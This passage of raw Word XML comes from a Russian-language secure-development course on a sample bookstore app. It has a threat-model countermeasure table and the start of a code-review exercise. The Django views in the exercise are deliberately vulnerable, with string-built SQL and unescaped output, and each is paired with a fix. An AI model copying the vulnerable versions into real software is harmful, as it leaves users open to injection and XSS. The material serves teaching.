    <w:p w14:paraId="091CA37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5. Определение мер противодействия (Controls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB7A78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</w:rPr>
        <w:t>Для каждой ключевой угрозы определим контрмеры.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="18"/>
        <w:tblW w:w="10201" w:type="dxa"/>
        <w:tblInd w:w="-56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80"/>
        <w:gridCol w:w="5608"/>
        <w:gridCol w:w="2713"/>
      </w:tblGrid>
      <w:tr w14:paraId="78B1CA2D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10A6A4E0">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="35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Угроза</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="640FDA1F">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="101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Меры противодействия (Что делать?)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F2FD2AB">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="3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Категория (Митригация)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="497F092F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A725C06">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="3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XSS-атаки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C489581">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="132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 Валидация и экранирование (escaping) всех пользовательских данных на выходе.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530F43FD">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="132"/>
                <w:tab w:val="left" w:pos="273"/>
              </w:tabs>
              <w:ind w:right="101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 xml:space="preserve">2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Использование</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Content Security Policy (CSP).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3041201B">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="132"/>
                <w:tab w:val="left" w:pos="273"/>
              </w:tabs>
              <w:ind w:right="101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 Безопасные фреймворки (например, React с автоматическим экранированием).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D79820D">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="38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Защита на уровне приложения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1CA1EE0C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B797E1D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SQL-инъекции</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54BFEA2B">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="273"/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Использование параметризованных запросов (Prepared Statements) или ORM.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE7D383">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="273"/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Строгие правила для учётной записи БД (минимальные привилегии).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EAA0C2D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на уровне приложения и БД</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="467CD71D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F86CB87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Неавторизованный доступ к API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FFA3ECB">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="273"/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Внедрение единого механизма авторизации (например, RBAC).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F6409F1">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="273"/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Проверка прав на каждом endpoint (ACL).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="613ACFE9">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="273"/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Использование стандартных библиотек для JWT-валидации с проверкой подписи.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2846FDA1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на уровне приложения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="13E78006">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A8EA1A6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Утечка данных из S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ABF1981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Настроить политики бакета "запретить публичный доступ по умолчанию".</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDC3B30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Выдавать временные pre-signed URL для скачивания книг после проверки прав в приложении.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27D79122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на уровне инфраструктуры</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="61D39849">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F5AA4D4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Подделка платежей</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67BE137B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Верификация платежа только через webhook платежного шлюза на стороне сервера (не доверять данным от клиента).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53724B35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Проверка криптографической подписи уведомления от шлюза.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62BC0333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бизнес-логики</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B695640">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E175B69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Отказ от действий (Repudiation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="111ACE59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Ведение детальных, защищённых от изменений аудит-логов всех критических действий (покупка, вход, изменение данных).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. Интеграция с SIEM-системой для мониторинга.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C6AE1E8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Аудит и мониторинг</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="28EB17C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B131852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DDoS-атаки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17D78ECB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1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Использование</w:t>
            </w:r>
            <w:r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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>облачного</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> WAF (Web Application Firewall, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>например</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, AWS WAF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>или</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Cloudflare).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. Настройка лимитов запросов (rate limiting) на уровне API-шлюза или приложения.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0698DE08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План масштабирования инфраструктуры.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="318A7D06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на уровне инфраструктуры</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0BB67E3B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1880" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34384FF3">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="3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Утечка токенов/сессий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F5FE20F">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="10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Использование короткоживущих Access Token и механизма Refresh Token.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. Хранение токенов в httpOnly, Secure, SameSite cookies.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3. Внедрение чёрного списка (blacklist) скомпрометированных токенов.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2713" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C704FE9">
            <w:pPr>
              <w:pStyle w:val="10"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="567"/>
              </w:tabs>
              <w:ind w:right="3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на уровне приложения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="594C309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</w:p>
    <w:p w14:paraId="5AF1D45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6. Выводы и рекомендации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B389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В результате моделирования угроз для приложения BookHub были выявлены критические зоны риска:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E65BFEF">
      <w:pPr>
        <w:pStyle w:val="10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Наибольший риск представляют атаки на уровень приложения: XSS, SQL-инъекции и недостаточная авторизация (BOLA). Это требует обязательного проведения регулярного код-ревью и использования статического анализа кода (SAST) в CI/CD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30810293">
      <w:pPr>
        <w:pStyle w:val="10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Конфиденциальность данных зависит как от кода (защита от инъекций), так и от конфигурации инфраструктуры (настройки S3, БД). Необходимо использовать инструменты инфраструктурного сканирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604C9791">
      <w:pPr>
        <w:pStyle w:val="10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Целостность бизнес-процессов (оплата) требует строгой server-side валидации и интеграции с платёжными системами по безопасным протоколам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F9188">
      <w:pPr>
        <w:pStyle w:val="10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Рекомендуется внедрить следующие практики в процесс разработки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5EF1E9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Security by Design: учитывать выявленные угрозы на этапе проектирования новых функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7359E0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OWASP Top 10 как чек-лист: использовать для регулярной проверки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234BC550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Пентестинг: регулярно проводить тестирование на проникновение, особенно для платежного модуля и админ-панели.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDD46DC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Мониторинг и реагирование: настроить алерты на подозрительную активность (множественные неудачные логины, запросы к админ-эндпоинтам).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF4339F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Данная модель угроз является живым документом и должна пересматриваться при каждом значительном изменении архитектуры приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D427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</w:p>
    <w:p w14:paraId="789B91B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Задание для самостоятельной работы:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Выберите один компонент (например, "Процесс восстановления пароля") и детально распишите для него модель угроз по шагам 4 и 5, используя методологию STRIDE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039EAF5B">
      <w:pPr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bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43276BF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ПРАКТИЧЕСКАЯ РАБОТА №2: АНАЛИЗ КОДА НА НАЛИЧИЕ СТАНДАРТНЫХ УЯЗВИМОСТЕЙ (РУЧНОЙ ПРОСМОТР)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322420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5A64CED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Цель работы:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Научиться выявлять классические уязвимости веб-приложений (из OWASP Top 10) путём ручного просмотра исходного кода, понять логику их возникновения и методы исправления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F390F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Исходные данные:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t> Рассмотрим фрагменты кода типового веб-приложения "BookHub" на Python (Django/Flask) и JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281CEE6F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</w:p>
    <w:p w14:paraId="78F3E71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Задание 1: Анализ бэкенд-кода (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF49A1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Файл: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>views.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> (Упрощённый Django View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C77A2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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A7282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># views.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC3A2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from django.shortcuts import render, get_object_or_404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0FF03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from django.http import HttpResponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F461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from .models import Book, UserProfile, Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B0F7E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sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E24774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json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58007E3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25F5D57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1: SQL-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>инъекция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(SQL Injection - A03:2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B5B3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search_books_unsafe(request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B7727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query = request.GET.get('q', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B0555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КРИТИЧЕСКАЯ УЯЗВИМОСТЬ: Прямая конкатенация пользовательского ввода в запрос.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC6D75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conn = sqlite3.connect('db.sqlite3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F7A7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cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554B30F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sql = f"SELECT * FROM books_book WHERE title LIKE '%{query}%'"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ОПАСНО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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A2D4A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cursor.execute(sql)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&lt;-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здесь</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C5628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results = cursor.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62075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render(request, 'search.html', {'results': results})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C1AD0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0C18373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search_books_safe(request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180A357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query = request.GET.get('q', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB291F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ИСПРАВЛЕНИЕ: Использование параметризованных запросов (ORM или курсор с параметрами).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F977CB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conn = sqlite3.connect('db.sqlite3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419932B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cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3C022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sql = "SELECT * FROM books_book WHERE title LIKE ?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722A8FC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 xml:space="preserve">cursor.execute(sql, ('%' + query + '%',))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Параметр безопасно подставляется</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DB367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results = cursor.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C627D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render(request, 'search.html', {'results': results})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF4039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553A2AB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2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Межсайтовый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скриптинг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(Cross-Site Scripting - A03:2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33869D0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book_detail_unsafe(request, book_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4305D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book = get_object_or_404(Book, pk=book_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44AD7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ОПАСНО: Пользовательский отзыв сохраняется и выводится без экранирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BFF20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user_review = book.reviews.first()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB4756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context = {'book': book, 'review_text': user_review.text if user_review else ""}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05096E5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render(request, 'book_detail.html', context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DB3C8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56ACD11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ИСПРАВЛЕНИЕ: В шаблоне book_detail.html ДОЛЖНО использоваться автоматическое экранирование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF44D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{{ review_text }} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>вместо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{{ review_text|safe }}. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Или экранирование на стороне сервера перед выводом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1660B6E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1754E09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Уязвимость 3: Небезопасная десериализация (Insecure Deserialization - A08:2017/2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E387DD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import_settings(request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841309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request.method == "POST":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F12E1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</w:rPr>
        <w:t># КРИТИЧЕСКАЯ УЯЗВИМОСТЬ: Десериализация непроверенных пользовательских данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8265D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user_data = request.POST.get('settings')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A1DD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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A752B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settings = json.loads(user_data)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JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>обычно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безопасен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, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>но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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261D044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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Опасно, если это был pickle.loads(user_data)!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4239204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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24984ED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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02162C8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... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>логика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обработки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settings ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B82D3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return HttpResponse("OK")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC34F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6C797E6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Уязвимость 4: Недостаточное логирование и мониторинг (A09:2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF289D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delete_order(request, order_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729DAF2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order = get_object_or_404(Order, pk=order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2654522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request.user != order.user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE0F2B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</w:rPr>
        <w:t># ПЛОХО: Нет логирования попытки несанкционированного доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB5D8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return HttpResponse("Forbidden", status=403)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D0974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order.delete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284778D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ПЛОХО: Нет аудита критического действия (удаление заказа).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2F2D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 xml:space="preserve">print(f"Order {order_id} deleted")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Print - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>неэффективное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логирование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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5A36A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HttpResponse("Deleted")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFB91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5D9CEDD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delete_order_safe(request, order_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D315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import logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39AC9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logger = logging.getLogger('security')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F179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order = get_object_or_404(Order, pk=order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58C38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request.user != order.user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B533EB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</w:rPr>
        <w:t># ИСПРАВЛЕНИЕ: Логируем попытку несанкционированного доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1399860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logger.warning(f"Unauthorized delete attempt. User: {request.user}, Order: {order_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7F0C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HttpResponse("Forbidden", status=403)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C85D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order.delete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C66B0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ИСПРАВЛЕНИЕ: Логируем успешное критическое действие.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C03FB8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logger.info(f"Order {order_id} deleted by user {request.user.id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD52EA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HttpResponse("Deleted")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466BA9F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106C8B6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Файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>utils.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2BA44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python</w:t>
      </w:r>
    </w:p>
